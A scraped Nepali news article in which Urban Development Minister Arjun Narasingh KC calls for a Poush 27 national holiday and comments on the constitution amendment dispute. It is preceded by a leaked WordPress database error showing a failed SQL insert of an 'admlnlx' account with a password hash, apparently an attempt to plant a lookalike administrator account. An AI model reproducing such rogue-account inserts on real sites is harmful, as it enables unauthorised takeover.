WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKNr2xs1UBecgCZa0J5FCmMxhYpEYk.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:42:08', '', 'admlnlx', 'admlnlx')
चितवन, पुस १०–
शहरी विकास मन्त्री अर्जुन नरसिंह केसीले राष्ट्रिय एकता दिवसको अवसरमा पुस २७ गते राष्ट्रिय विदा हुनुपर्ने बताउनुभएको छ ।
पूर्व राजा पृथ्वीनारायण शाहले देशलाई एकीकृत गरेको अवसरमा पुस २७ गते राष्ट्रिय विदा दिने तयारी भईरहेको मन्त्री केसीले जानकारी दिनुभयो । प्रेस युनियन चितवनले आज भरतपुरमा गरेको पत्रकार भेटघाटमा बोल्दै उहाँले राष्ट्रिय विदा दिनका लागि आफूले प्रयास गरिरहेको बताउनुभयो । विदाको अन्तिम टुङगो मन्त्रीपरिषद्बाट लाग्ने भन्दै मन्त्री केसीले यसका लागि अन्तिम प्रयास भईरहेको बताउनुभयो । उहाँले भन्नुभयो–“मेरो व्यक्तिगत कुरा गर्ने हो भने एकता दिवमा विदा दिनुपर्छ, तर अन्तिम निर्णय मन्त्रीपरिषद्कै रहन्छ ।”
यस्तै मन्त्री केसीले संसदमा संविधान संशोधनको प्रस्ताव टेवल हुन नदिने एमालेले चालेको कदम संविधान कार्यान्वयन हुन नदिने खेल भएको आरोप लगाउनुभयो । उहाँले लोकतान्त्रिक प्रणाली सबैले स्वीकार गरिरहेको बेलामा संसद नै चल्न नदिनु संविधान कार्यान्वयनमा बाधा पुर्याउनु रहेको बताउनुभयो । उहाँले एमालेलाई प्रस्ताव फेल गराउन अधिकार भएपनि संसदलाई चल्न नदिनु दुर्भाग्य भएको बताउनुभयो ।
मन्त्री केसीले ठूला तीन दल र मधेसी मोर्चा एकै ठाउँमा उभिएर अहिलेको समस्याको निकास निकाल्नुपर्ने समेत बताउनुभयो । उहाँले संविधान कार्यान्वयनका लागि सबै दल एकै ठाउँमा उभिनुको विकल्प नरहेको बताउनुभयो ।
यस्तै मन्त्री केसीले पूर्व राजा ज्ञानेन्द्र पनि यो देशको नागरिक भएकाले बोल्न, हिड्न डुल्न पाउने अधिकार रहेकाले सानातीना कुरामा ठूला ठूला टिप्पणी जरुरत नरहेको बताउनु भयो । उहाँले सघीय लोकतान्त्रीक गणतन्त्रमा चुनौती आए मात्र सबै एकजुट भएर अघि बढ्नुपर्ने बताउनुभयो ।